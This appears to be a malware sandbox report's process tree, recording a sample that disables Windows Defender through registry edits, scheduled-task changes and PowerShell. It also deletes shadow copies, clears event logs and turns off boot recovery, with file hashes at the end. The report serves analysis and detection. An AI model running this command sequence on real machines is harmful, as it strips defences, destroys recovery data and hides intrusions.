C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1932
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1796
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:928
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:612
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1332
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1720
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1116
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:848
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:752
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1940
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1256
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1944
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1748
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1392
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:944
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1616
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:456
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1396
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1148
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1292
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1980
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:756
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1060
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:240
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:484
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2000
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:388
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1628
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:888
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:988
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD577a51484f9ceae82d4fa6465a04bd928
SHA165a6612df040610f5d58ef3b3efa35d8d7bb7bc1
SHA25619f9150c6ce2062757b5a69e0ea00d0d42ba09b1f14e87f1360cb41a196e3164
SHA512ee433697b328b9052cb2baf838dbf04acc4c14528c3ede5150c837decb6d0787d8851ea2d0d5299e477c2fbdc5c3f0d71cc19dc1dd0ab34d3982e3edc2366f19